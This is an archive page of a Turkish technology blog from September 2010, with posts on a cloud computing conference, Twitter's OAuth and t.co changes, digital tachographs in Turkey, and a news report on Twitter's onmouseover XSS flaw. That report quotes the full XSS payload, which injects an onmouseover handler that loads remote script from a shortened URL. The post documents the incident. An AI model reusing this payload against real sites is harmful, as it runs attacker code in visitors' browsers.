Browse > Home / Archive: September 2010

| Subcribe RSS

Cloud Computing, Bulut Bilişim evrimi başlıyor

September 28th, 2010 | No Comments | Posted in Bilgi Teknolojileri, Business, Konferans, Technology

Cloud Computing kavramına her ne kadar Bulut Bilişim demeye pek yanaşmasam da, sanırım en genel ve yakışan çevirisi bu olacaktır. Geleceğin teknolojileri olarak lanse edilen Cloud Computing, en genel anlamda; internet bazlı çalışma sistemine dayanarak, birçok istemci/server tarafından paylaşılan kaynak, bilgi ve işlem gücünü temsil ediyor. Bu konunun liderlerinden olan Salesforce.com’un CC hakkında yapmış olduğu bir video bulunuyor, izlemenizi öneririm:

Konuyla ilgili olarak geçtiğimiz hafta EMC’nin düzenlemiş olduğu Cloud Computing konferansına katıldım. Konuları anlık olarak twitter hesabımdan aktarmaya çalışsam da, derlediğim tüm notlarımı bu blog yazımda toplamaya karar verdim. Konferansa birçok firma değişik ve benzer çözümleriyle, Cloud Computing’e yaklaşımlarını ve planladıkları roadmap’lerini paylaştılar.

Konferans’ın en etkili firmalarından olan VMware’in sunumunu yapan 2. başkanı Türk asıllı Enis Konuk’tu. Günümüz hakkında bilgiler aktardıktan sonra çarpıcı bir açıklama geldi: 2009’un son çeyreğinden itibaren sanal sunucular, fiziksel sunucu satışlarını geride bırakmaya başlamış. Geleceğin bilgi havuzlarının zettabyte seviyesine çıkma beklentisiyle birlikte Cloud Computing’in önemine değinilirken, 2020 itibariyle 35 zetabyte data beklentisinin olduğunu ve bunun da 75 milyar tam dolu 16GB’lik iPad bilgisine eşdeğere olacağı aktarıldı. Bu değer günümüzdeki tüm dataların 44 katına eşdeğer; kabaca 20 senede 44kat artış beklentisi var diyebiliriz (Bu arada hatırlatmak gerek: 1 zettabyte = terabyte x gigabyte).

Dünya’daki %84 sanallaştırma hizmetleri VM üzerinde yer alırken, VM’in özellikle gelecekte halka açık cloud veri merkezleri ve sanal masaüstü planları var. Ayrıca firmanın Cloud kavramına yaklaşım sergilediği motto’su da bir hayli hoşum gitti: Virtual Roads, Actual Clouds

Sahneye Türkiye servis sektörünün 2.si olan Koç Sistem çıkarken, firma özellikle Cloud Computing yönetiminin çok zor olduğunu, altyapının hazır olmasına rağmen özellikle entegrasyon açısından sistemin bir hayli sancı çekeceğini dile getirdi.

Bulut Bilişim’in hedefleri arasında: Global Workload Deployment, Data Center Management ve Information Security kavramları yer alıyor. Bu noktada Uber Cloud olarak tanımlanan firmalar arasında Google, Amazon ve Microsoft bulunuyor. Girmesi kolay ama çıkması zor bir model olarak öne çıkan Uber Cloud firmaları, daha çok service provider olarak tanımlanıyor diyebiliriz. EMC’nin Private Cloud kavramında ise; maliyetleri azaltmak için IT Üretkenliği (IT production, lower costs), Servis kalite arttırımı için İş Üretimi ( Business production (improve QoS) ve Servis olarak IT (IT as a Service (Improve agility – facebook örneği) gibi kavramlar yer alıyor.

Ve sahneye Cisco çıkıyor. Cisco’nun Cloud Computing tanımı ise oldukça başarılı: ” Anywhere, Anyone, Any Service” – “Herhangi bir yerde, herhangi biri, herhangi bir servis”. Cisco’ya göre Cloud’a geçiş’in nedenleri 3 aşamada sıralanıyor: Higher cost of ownership, Silo resource pools, Longer provisioning time. Cloud Sistemlere geçiş ile birlikte özellikle SMB şirketlerinin avantaja sahip olacağı vurgulanıyor. SMB’ler özellikle, klasik IT çözümlerine alternatif olarak ucuz ve etkin Cloud çözümlerini seçecekler.

Biraz da Cloud Service’lerin çeşitliliklerinden bahsedelim:

Software-as-a-service (SaaS)
Önceden ayarlanmış ve web-browser’larımızdan kolayca eriştiğimiz servisler olarak tanımlayabiliriz. Tüketiciler ve iş çözümleri olarak herkes tarafından kullanabilecek olan servisler. WebEx, Google Apps, salesforce.com u örnek olarak gösterebiliriz.

Platform-as-a-service (PaaS)
Platform geliştirmek için tasarlanan bu sistemle birlikte, geliştiriciler kendi uygulamalarını ya da ara-yazılım olarak tanımlanan middleware’lerini geliştirebiliyor. Bu servislere örnek olarak Google AppEngine ve MS Azure Service sistemlerini gösterebiliriz.

Infrastructure-as-a-service (IaaS) Sanal Sunucular ve IT,  internal cloud ya da servis sağlayıcılar olarak tanımlanabilir. Yabancıların pay-as-you-go olarak tanımladığı servisler olarak ta adlandırabiliriz. Amazon Elastic Compute – EC2 @ S3, Terramark, Google Base gibi hizmetler örnek olarak gösterilebilir.

Amerika’da devler kuruluşu olan NIST’in Cloud Computing Tanımı ise 3 aşamadan oluşuyor. Ayrıntılarına fazla girmeyeceğim, detaylı bilgi için ilgili dökümana gözatabilirsiniz

  • Essential Characteristics
  • Service Models
  • Deployment Models

Evet genel olarak firmaların Bulut Bilişim’den beklentileri, öngörüleri bu şekilde sıralanıyor. Şimdi biraz da, olabilecek sıkıntılardan bahsedelim:

Cloud yapısının henüz hala gelişme aşamasında olduğuna değinmemiz gerekiyor. Her firmanın bakış açısı, çözümleri, üzerinde durduğu ve yoğunlaştığı farklı alanlar var. Bu nedenle açıklamalar, kullanım alanları, teknolojiler, riskler, sorunlar ve yararlar hala tam olarak belirlenebilmiş ve standart olarak tanımlanabilmiş değil. Gelişme aşamasında olduğu için zaman içinde terimler daha net bir biçimde ortaya konacaktır.

Tüm bu bilgiler ve kavramlar doğrultusunda, ortaya çıkabilecek en büyük engellerin başında; Güvenlik, Kontrol, Uygunluluk (Regülasyon) ve Kalite’nin yanında SLA’ler bulunuyor.

Seminer’den aktaracaklarım ve kendi bilgilerimle harmanladığım yazının sonuna gelirken, Cloud Computing kavramının hala emekleme aşamasında olduğunu ancak ciddi bir ivmelenme ile günümüz teknolojilerine aktarılmaya başlandığını hatırlatmak gerek. 2 önceki paragrafta da belirttiğim gibi, yapı hala gelişme yani evrim aşamasında. Evrim tamamlandığında ise, ortaya ciddi bir oluşum çıkacak. Ben özellikle artık evlerdeki PC kavramının tarihe karışacağını ve tüm yapıların sunucu sistemlerine geçeceğini düşünüyorum. Ancak kontrolün bizde olmadığı bir teknolojiden de oldukça çekindiğimi belirtmeden edemeyeceğim:

Peki, Geleceğin Kontrolü kimde olacak?


Tags: , , , , , ,

Twitter’ın mouseover java script açığı, tüm kullanıcıları etkiledi

September 21st, 2010 | No Comments | Posted in Exploit, Vulnerability

Bugün gerçekleşen bir güvenlik açığı, tüm twitter kullanıcılarını etkisi altına aldı. Twitter hesaplarını web üzerinden kullanan kullanıcıları etkisi altına alan bu kod açıklığı, listenizdeki kullanıcıların tweet’lerine yansıyan arka planı ve yazıtipi siyah bir şekilde karşımıza çıktı. Siz fare imlecinizi bu tweet’in üzerine getirir getirmez, otomatik olarak RT yani Re-tweet yapmanızı sağlayan ilgili açıklık, yine web tarayıcınıza twitter’dan kaynaklı olarak değişik hata mesajı içerikleriyle karşılandı. İçeriği aşağıdaki şekilde olan açıklığın, ekran görüntüsüne de aşağıdan ulaşabilirsiniz:

http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7’)”/

Twitter Fail

http://yfrog.com/mqdirdp

Sorunun şimdilik giderilmesi için mobile.tweeter.com sitesi önerilirken, tweetdeck gibi 3rd yazılımların da, sorundan etkilenmediğini belirtmem gerekiyor. Resmi bir açıklama yapmayan twitter, benzer durumlarda kullandığı twitter hesabından kullandığı status raporlarından konunun XSS attack ‘a bağlı olarak açıklıktan faydalanıldığını ve kısa sürede giderileceğini haber vermiş.

Tags: , , , , , , , ,

twitter’ın sunduğu yeni özellikler

September 20th, 2010 | No Comments | Posted in Mobile

Micro-blogging kavramı blog yazmayı arka planda bıraksa da, blog’lara eklenen bu ara uygulamalar ile twitter gibi anlık iletilerinizi girebileceğiniz bu platformlarınıza doping yapmanız mümkün.

İnternet’in tartışmasız en popüler sosyal paylaşım /micro-blogging sitesi olan twitter, yakın bir süre içinde yeni arayüzüne kavuşacak. Bu konuda yaptıkları birkaç yenilik, bu sistemin yeni arayüzüne hazırlık olarak düşünülmüş olduğunun bir göstergesi diyebiliriz.

Geliştirilen pek çok uygulama, kendi platformlarını oluşturmak yerine twitter API’sini kullanarak direkt olarak twitter ile entegre çalışabiliyor. Dünya’da Twitter API’sini kullanan 250.000’in üzerinde uygulama olmasının yanında, bunların en popülerleri arasında masaüstü ve mobil olarak kullanabilen tweetdeck, web-sitesi olarak TweetMeme, tweeter’a özel iPhone ve Blackberry uygulamalarının yanında ayrıca çevrimiçi lokasyon bazlı Foursquare bulunuyor.

Yukarıda saydığım yeni twitter özelliklerinden ilki, bu uygulamaların twitter’a erişmesi için sağlanan “OAuth” erişimi. 31 Ağustos’tan itibaren kullanılmaya başlanan bu özellik ile;

  • Şifrenizi istemeden tamamen sizin onayınıza bağlı olarak uygulamaların twitter’ınıza erişim sağlanması
  • Masaüstü ve mobil uygulamalar şifrenizi istemeye devam edecek ancak OAuth kullanılacağı için sizin zaman diliminiz ya da isteğinize bağlı olarak tweetlenmesi

Peki bu özelliğin kullanıcılara ne gibi faydaları var?

  • OAuth ile uygulamalar şifrelerinizi kendi ortamlarında saklayamayacak
  • Şifrenizi değiştirseniz bile uygulamalar twitter hesabınıza erişmeye devam edebilecek
  • Bazı uygulamalar tekrardan onayınızı isteyebilir ya da tamemen kullanımı kısıtlayabilir. Bu kısıtlama konusunda özellikle iPhone ile kullandığım twitterrific uygulamasını örnek gösterebilirim. Bu nedenle artık tweetdeck kullanıyorum
  • Yetki verdiğiniz tüm uygulamalara, http://twitter.com/settings/connections adresinden bakabilirsiniz

Bir diğer özellik ise daha çok kontrol amaçlı olarak eklenmiş. Yeni eklenen t.co URL wrapping özelliği ile kısaltılmış URL’lerin kontrolü twitter tarafından sağlanarak, ilgili internet adreslerinin herhangi bir malware ya da phishing olma riskini ortadan kaldırarak, daha güvenli bir paylaşım ortamı sunuluyor.

Tüm bu eklenen özelliklere ek olarak, twitter’ın yakın zamanda tüm kullanıcılarına sunacağı yeni arayüz bilgilerine http://twitter.com/newtwitter adresinden erişebilirsiniz. Yeni arayüz ile eskiye oranla daha interaktif bir paylaşım platformu hedeflendiğini gözlemeyebilirsiniz.

Tags: , , , ,

Türkiye Avrupa Birliği kapsamında Dijital Takograf Sistemi’ne geçiyor

September 3rd, 2010 | No Comments | Posted in Authentication, Kimlik Yönetimi

Güvenlik hayat kalitemizi ve dolaylı olarak yaşam biçimimizi şekillendiren unsurlar arasında yer alırken, özellikle trafik güvenliği birçok alanda daha önemli bir rol oynuyor. Bu kapsamda Avrupa Birliği kapsamında yer alan 3821/85/AET tüzük gereğince, diğer ülkelerde kullanılmaya başlanan Dijital Takograf Sistemi, Türkiye için 2010 senesi itibariyle yürürlüğe giriyor. Bu uyum süreci en basit ve genel anlamda 3821/85/AET ve 561/2006/AET sayılı tüzükler doğrultusunda, azami ağırlığı 3,5 tonu geçen bir araçla taşımacılık yapan her sürücünün, kayıt cihazı yani digital takograf kullanması zorunlu hale geliyor.

Aslında AB, 1 Mayıs 2006’dan itibaren, üye ülkelerdeki yeni araçlarda sayısal (dijital) takograf kullanılmasını zorunla hale getirdi. Uyum süresince büyük ihtimalle bürokrotik işlemlere mağruz kalan bu uygulama, ülkemizde sene sonuna doğru faaliyete geçmesi bekleniyor.

Peki bu uygulama sisteme ne gibi yararlar sağlıyor?

  • Yeni araçların plaka gibi tanım bilgilerinin yetkili servisler tarafından digital takografa işlenmiş olması gerekiyor
  • Şoför kartı verilerinin en geç her 28 günde bir elektronik olarak indirilmesi ve arşivlenmesi gerekiyor
  • Araç verilerinin en geç her 3 ayda bir elektronik olarak indirilmesi ve arşivlenmesi gerekiyor
  • Firmanın nakliye sorumlusunun bu bilgileri düzenli olarak takip ederek sürüş saatlerinin ve diğer tüm bilgilerin doğruluğu ve sağlamlığından emin olması, ihlal durumlarında sürücüyü bilgilendirerek uyarması gerekiyor
  • Verinin güvenliğinin sağlanması amacıyla verilerin düzenli olarak arşivlenerek yedeklenmesi gerekiyor
  • Gerekli olduğunda incelenebilmesi amacıyla, tüm sürücü ve araç bilgilerinin en az 1 yıl süre ile araç dışında elektronik olarak saklanması ve arşivlenmesi gerekiyor

Maddelerin bazılarından görebileceğiniz gibi, tüm kayıtlar analog yerine dijital ortamlarda saklanıyor. Böylece şöförlerin ilgili takograflara herhangi bir şekilde müdahalesi mümkün olmuyor ve araçların yaptıkları km’lerden tutun da, ne zaman ve nerede mola verdiklerine kadar pekçok bilgi, şöförlere özel olarak sağlanan bu dijital kartlarda saklanıyor. Türkiye’de ortalama 500.000 adet taşımacılık yapan araç olduğu düşünüldüğünde, dijital takograf kullanımı konusunda ciddi bir eğitime ve uyum sürecine ihtiyaç olduğu açıkça görülüyor.

Güvenlik anlamında dijital sertifikasyon süreçleri yine adını vermeyeceğim bazı HSM ‘lerle sağlanıyor. AB’nin Root CA’nin yanında her ülkenin gerekli şartlar ve kurallar doğrultusunda oluşturulan Sub-CA dediğimiz, o ülkeye ait bir Sub-Root CA bulunuyor ve tüm şöförlere dağıtlacak olan kartlarda yer alan dijital sertifikalar bu CA ile oluşturuluyor. Eğer sistemi teknik olarak incelemek isterseniz ilgili tüm şartlara Digital Tachograph SystemEuropean Root Policy dökümanından ulaşabilirsiniz.

Proje başarılı bir şekilde oluşturuldu ve hayata geçmek üzere.  Türkiye ve taşımacılık sektörü adına sağlıklı ve ileriye dönük olarak başarılı bir proje olacağına gönülden inanıyorum.

Tags: , , ,
  • Site istatistik

    Bugünkü ziyaret: 16
  • Add to Technorati Favorites

    Mail adresinizi girin:



  • Google Connnect
  • RSS DarkHardWare News